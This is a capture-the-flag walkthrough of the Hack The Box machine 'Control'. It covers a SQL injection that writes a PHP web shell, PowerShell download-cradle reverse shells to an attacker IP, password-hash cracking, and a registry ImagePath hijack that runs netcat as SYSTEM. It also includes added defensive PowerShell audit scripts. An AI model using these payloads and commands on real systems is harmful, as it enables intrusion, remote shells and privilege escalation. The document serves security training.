Hey fellas!! This is Shreya Pohekar and today we'll be walking through Control from Hackthebox. It was a hard Windows machine. The initial foothold on the machine (as the wwwroot web user) exploited a SQL injection, which I used to upload a web shell. Getting to user was pretty straightforward, as sqlmap listed the password hashes. Privilege escalation to root required reading through a PowerShell history file, which gave us interesting commands for querying the registry. The user had full control over the registry Services key, so that could be abused to get an administrator shell.
With all that said, let's dive in!!
Start with an nmap scan to find the open ports and services.
# nmap -sC -sV -o control.nmap 10.10.10.167
From the nmap scan, we can conclude that we might get our initial foothold from HTTP.
So let's jump onto the site, http://10.10.10.167, and we get a page.
There is a login button, but unfortunately we can't access it. And it says to set up a proxy!!!!
But which IP to forward the request through??
So after viewing the page source of the launcher page, I found this!!
I got the IP to forward the request through. So set up Burp, add the X-Forwarded-For header, and admin.php loads.
Scrolling through the page, options to create products and categories were implemented, along with a search bar.
I found a SQL injection in the search bar, so I manually formed queries to find the database, the users and the number of tables, and got the following result.
The database was found to be warehouse and the user was manager.
Alongside manual enumeration, I copied the request to a file, search.req, and started sqlmap.
# sqlmap -r search.req --all --batch
(--batch automates the yes/no prompts from sqlmap)
It found a lot of juicy stuff, such as the password for manager and password hashes for hector and root.
And a few other password hashes.
After getting the password for manager, I tried getting a remote shell with evil-winrm and psexec.py, but it didn't work out. So now we need to somehow upload a shell to the box to get a reverse shell.
I got this blog that totally served the purpose.
But we need to find out where to upload the shell. Since the default document root for the IIS web server is C:\inetpub\wwwroot, I tried uploading the shell there.
Since Burp was continuously generating errors, I tweaked the payload I was using. Finally this payload worked:
'; select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'C:\\inetpub\\wwwroot\\shell.php';#
The file gets uploaded, though the page still returns a general error.
Time to take a reverse shell…
I used powercat.ps1 to obtain the reverse shell.
Just add a line to the end of the file that will execute the script.
Now go to the browser and issue a command to grab powercat.ps1 from the local machine:
10.10.10.167/shell.php?cmd=powershell "iex(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1');"
Listen on port 443 for the incoming connection and also set up a Python SimpleHTTPServer.
As the command on the browser executes, we get a shell.
Next, grab winPEAS.exe onto the box the same way and run it.
WinPEAS did not return any interesting results.
Meanwhile, sqlmap had completed and dumped all the results to files inside /root/.sqlmap.
I tried to crack the hashes I had previously obtained for hector and root using hashcat.
hash-identifier gave the following result
# hashcat --example-hashes | grep -i -B2 mysql
Mode 300 looked similar to what hash-identifier identified.
# hashcat --user -m 300 user_hashes /usr/share/wordlists/rockyou.txt --force
This command can be used when there is more than one password hash; the file format is:
User:password_hash
And the password cracked for hector.
Now back to our Windows machine: we again take a reverse shell, this time with hector's creds. We create a PSCredential, which takes the username in plain text and the password as a SecureString. This method is useful for login automation. You can read about PSCredential from here.
# $pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force
# $cred = New-Object System.Management.Automation.PSCredential('.\hector', $pass)
# $cred
The hostname of the machine is Fidelity. Check it with # hostname
Now set up a Python web server and spawn nc listening on the chosen port. The command below gives the reverse shell, but now as hector.
# invoke-command -Computer Fidelity -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.81/powercat.ps1') }
Now we can grab our user.txt…
NOTE: rlwrap nc -lnvp can be used to get the arrow keys working in the Windows shell.
So now time to root!
Again I ran winPEAS.exe but didn't find interesting results. Then I found this file: PSReadline.
This is the PowerShell history file (similar to .bash_history on Linux). Listing its contents, I found two commands relating to the registry.
> get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
The command lists the subkeys under CurrentControlSet, Services among them, which is where the service definitions live in the registry.
Property      : {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Control
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 121
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 11
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control

Property      : {NextParentID.daba3ff.2, NextParentID.61aaa01.3, NextParentID.1bd7f811.4, NextParentID.2032e665.5...}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Enum
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 17
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 27
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Hardware Profiles
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 3
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Policies
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 0
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Services
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 667
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services

Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName   : Software
PSDrive       : HKLM
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 1
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 0
Name          : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
The get-acl cmdlet gets you the security descriptor of a resource, such as a file or registry key. The Sddl field carries the access control entries of the resource in SDDL form.
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow -2147483648
S-1-5-32-549 Allow ReadKey
S-1-5-32-549 Allow -2147483648
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -2147483648
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow ReadKey
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow -2147483648
Audit :
Sddl : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOID;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)
Based on the above two results, I found out that hector has full control over the registry.
As a note, these commands list SDDLs. Security Descriptor Definition Language (SDDL) is a text format for specifying Windows security descriptors: it describes who owns an object such as a file or registry key, and it may also carry the ACL for the object or its group.
# $acl = get-acl HKLM:\System\CurrentControlSet\Services
# ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | Foreach-Object {$_.DiscretionaryAcl}
So that's a much more readable form, showing that hector has full control over the registry Services key.
# cd HKLM:
# cd SYSTEM\CurrentControlSet\Services
We need to find all the services running as LocalSystem, so that we can modify one of them and get a reverse shell as NT AUTHORITY\SYSTEM.
The service (running as LocalSystem) should have a manual startup type, and we should have permission to start and stop it.
Start : 3 (signifies manual start mode)
ImagePath (the executable the service loads on start; this is where we have to bind our shell)
ObjectName : LocalSystem (a service running under the LocalSystem account has complete, unrestricted access to local resources)
Now I'll filter the services on the three parameters described above.
# cd SYSTEM\CurrentControlSet\Services
# $services = Get-ItemProperty -Path *
# $temp = $services | where { ($_.ObjectName -match 'LocalSystem') }
# $temp | select PSChildName | measure
# $temp = $services | where { ($_.ObjectName -match 'LocalSystem') -and ($_.Start -match '3') }
# $temp | select PSChildName | measure
After filtering, I found that wuauserv (Windows Update Service) is one service that matches the criteria. So let's exploit!!
# sc.exe sdshow wuauserv
Below is the SDDL set on the wuauserv service, which makes it exploitable.
# ConvertFrom-SddlString -Sddl "D:(A;;CCLCSWRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)" | Foreach-Object {$_.DiscretionaryAcl}
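The SDDL decoding above and the LocalSystem/manual-start filtering before it are the two halves of one check, so here they are combined into an audit script a defender can run to find the same exposure before someone else does. This is an added example and not code from the write-up; it assumes an elevated PowerShell 5.1 or later session on the audited host, sc.exe on PATH, and treats SYSTEM, Administrators, TrustedInstaller and CREATOR OWNER as the only principals expected to write service configuration (that list is an assumption you may need to extend for vendor agents).

```powershell
# Added audit example, not code from the original write-up. It walks
# HKLM:\SYSTEM\CurrentControlSet\Services and reports services that run as
# LocalSystem with a manual start type (Start = 3) where a principal other than
# the trusted ones below can rewrite the service's registry key or its
# service-object DACL. Assumed: elevated PowerShell 5.1+, sc.exe on PATH.

$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Principals expected to hold write rights on service configuration (assumption).
$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                       'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')

# The same principals as SDDL trustee abbreviations (SY, BA, CO).
$TrustedSddlAliases = @('SY', 'BA', 'CO')

# Registry rights that allow changing ImagePath or the key's own ACL.
$RegistryWriteMask = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                           [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                           [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                           [System.Security.AccessControl.RegistryRights]::TakeOwnership)

function Get-UntrustedRegistryWriters {
    # Principals outside $TrustedPrincipals holding write-class rights on a key.
    param([Parameter(Mandatory)][string]$KeyPath)
    $acl = Get-Acl -Path $KeyPath -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($TrustedPrincipals -contains $who) { continue }
        if (([int]$ace.RegistryRights -band $RegistryWriteMask) -ne 0) { $who }
    }
}

function Get-ServiceDaclAces {
    # Splits the D: part of a service SDDL (as printed by sc.exe sdshow) into ACE
    # objects. ACE layout: (type;flags;rights;object_guid;inherit_guid;trustee)
    param([Parameter(Mandatory)][string]$Sddl)
    $dacl = if ($Sddl -match 'D:(?<d>.*?)(?=S:|$)') { $Matches.d } else { '' }
    foreach ($m in [regex]::Matches($dacl, '\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
        [pscustomobject]@{
            Type    = $m.Groups[1].Value
            Rights  = $m.Groups[3].Value
            Trustee = $m.Groups[4].Value
        }
    }
}

function Test-ServiceSddl {
    # Who, apart from trusted principals, can reconfigure the service
    # (DC = SERVICE_CHANGE_CONFIG, WD/WO = write DACL/owner, GA/GW = generic
    # all/write) or start it (RP = SERVICE_START, GX = generic execute, GA).
    param([Parameter(Mandatory)][string]$Sddl)
    $configWriters = @(); $starters = @()
    foreach ($ace in Get-ServiceDaclAces -Sddl $Sddl) {
        if ($ace.Type -ne 'A' -or $TrustedSddlAliases -contains $ace.Trustee) { continue }
        # Rights are a run of two-letter SDDL access codes; split them in pairs.
        $codes = for ($i = 0; $i + 1 -lt $ace.Rights.Length; $i += 2) { $ace.Rights.Substring($i, 2) }
        if ($codes | Where-Object { $_ -in 'DC', 'WD', 'WO', 'GA', 'GW' }) { $configWriters += $ace.Trustee }
        if ($codes | Where-Object { $_ -in 'RP', 'GX', 'GA' }) { $starters += $ace.Trustee }
    }
    [pscustomobject]@{ ConfigWriters = $configWriters; Starters = $starters }
}

function Find-WeakLocalSystemServices {
    foreach ($svc in Get-ItemProperty -Path "$ServicesKey\*" -ErrorAction SilentlyContinue) {
        if ($svc.ObjectName -ne 'LocalSystem' -or $svc.Start -ne 3) { continue }
        $regWriters = @(Get-UntrustedRegistryWriters -KeyPath $svc.PSPath)
        $sddlLine = (& sc.exe sdshow $svc.PSChildName 2>$null) |
                    Where-Object { $_ -match 'D:' } | Select-Object -First 1
        $svcAcl = if ($sddlLine) { Test-ServiceSddl -Sddl $sddlLine.Trim() } else { $null }
        if ($regWriters.Count -gt 0 -or ($svcAcl -and $svcAcl.ConfigWriters.Count -gt 0)) {
            [pscustomobject]@{
                Service            = $svc.PSChildName
                ImagePath          = $svc.ImagePath
                RegistryWriters    = ($regWriters -join ', ')
                ServiceConfigWrite = ($svcAcl.ConfigWriters -join ', ')
                ServiceStarters    = ($svcAcl.Starters -join ', ')
            }
        }
    }
}

Find-WeakLocalSystemServices | Format-Table -AutoSize
```

Start rights (RP) for Authenticated Users on a service are common and not a finding on their own, which is why the script reports them in a separate column; what made wuauserv abusable on this box was write access to its registry key for an ordinary user combined with the ability to start it. The fix is to restore a sane ACL on the Services key rather than to tune individual services.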
After querying the service, we find that it is stopped. That's what we wanted, because hector doesn't have permission to stop a running service.
Grab nc64.exe from the local machine and drop it at C:\Windows\System32\spool\drivers\color\nc64.exe using:
wget http://10.10.14.81/nc64.exe -o nc64.exe
> set-itemProperty -path wuauserv -Name ImagePath -Value "C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.14.81 9001 -e powershell"
> get-item wuauserv (to check that the new ImagePath was written)
# sc.exe start wuauserv
When we start the service, the binary in ImagePath gets loaded and executed. In our case nc64.exe runs and connects back to the listener spawned on the local machine using:
# nc -lnvp 9001
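Seen from the defender's side, what just happened is a LocalSystem service whose ImagePath now points at an executable in a folder ordinary users can write to. The script below, added here and not part of the write-up, sweeps every service's ImagePath for that pattern: it extracts the executable (handling quoted paths, environment variables, the \??\ and \SystemRoot prefixes drivers use, and trailing arguments), and flags binaries that sit outside the normal system roots, are missing, or live in a directory where a low-privilege principal holds write rights. It assumes an elevated PowerShell 5.1 or later session; the list of expected roots and low-privilege principals is an assumption to adjust per environment.

```powershell
# Added detection example, not code from the original write-up. Assumed:
# elevated PowerShell 5.1+ on the host being checked.

$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Directories where service executables are expected to live (assumption).
$ExpectedRoots = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64",
                   $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

# Low-privilege principals whose write access to the binary's folder is a red flag.
$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'Everyone', 'NT AUTHORITY\INTERACTIVE')

# File-system rights that let a caller replace or tamper with the binary.
$FsWriteMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                     [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                     [System.Security.AccessControl.FileSystemRights]::Delete -bor
                     [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                     [System.Security.AccessControl.FileSystemRights]::TakeOwnership)

function Get-ServiceExecutable {
    # Extracts the executable path from an ImagePath value: expands %SystemRoot%
    # style variables, strips the \??\ prefix, resolves \SystemRoot and relative
    # driver paths, honours quoting, and drops arguments such as "-k netsvcs".
    param([Parameter(Mandatory)][string]$ImagePath)
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath.Trim())
    $p = $p -replace '^\\\?\?\\', ''
    $p = $p -replace '^\\SystemRoot', $env:SystemRoot
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        $exe = if ($end -gt 0) { $p.Substring(1, $end - 1) } else { $p.Trim('"') }
    } elseif ($p -match '^(?<exe>.+?\.(exe|sys))(\s|$)') {
        $exe = $Matches.exe
    } else {
        $exe = ($p -split '\s+')[0]
    }
    if (-not [System.IO.Path]::IsPathRooted($exe)) { $exe = Join-Path $env:SystemRoot $exe }
    return $exe
}

function Test-LowPrivWritable {
    # True when a low-privilege principal holds write-class rights on the directory.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $FsWriteMask) -ne 0) { return $true }
    }
    return $false
}

function Find-SuspiciousImagePaths {
    foreach ($svc in Get-ItemProperty -Path "$ServicesKey\*" -ErrorAction SilentlyContinue) {
        if (-not $svc.ImagePath) { continue }
        $exe = Get-ServiceExecutable -ImagePath $svc.ImagePath
        $dir = Split-Path -Path $exe -Parent -ErrorAction SilentlyContinue
        $reasons = @()
        $inRoot = $ExpectedRoots | Where-Object {
            $exe.StartsWith($_, [System.StringComparison]::OrdinalIgnoreCase) }
        if (-not $inRoot) { $reasons += 'OutsideExpectedRoots' }
        if ($dir -and (Test-LowPrivWritable -Directory $dir)) { $reasons += 'LowPrivWritableDirectory' }
        if (-not (Test-Path -LiteralPath $exe)) { $reasons += 'BinaryMissing' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Service    = $svc.PSChildName
                Executable = $exe
                ImagePath  = $svc.ImagePath
                Reasons    = ($reasons -join ', ')
            }
        }
    }
}

Find-SuspiciousImagePaths | Format-Table -AutoSize
```

The tampered wuauserv entry trips LowPrivWritableDirectory because spool\drivers\color is writable by Authenticated Users even though it sits under System32, and BinaryMissing once the dropped nc64.exe is cleaned up. A point-in-time sweep like this complements, rather than replaces, logging of registry value writes under the Services key (Security event 4657 with a SACL on the key, or Sysmon event 13), which catches the ImagePath change at the moment it happens.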
Yes it was a long way to go but the reward is worth it!!
That’s all for the blog post. Thanks for reading!!
Until then, Happy Hacking!!
For more such content subscribe to my page.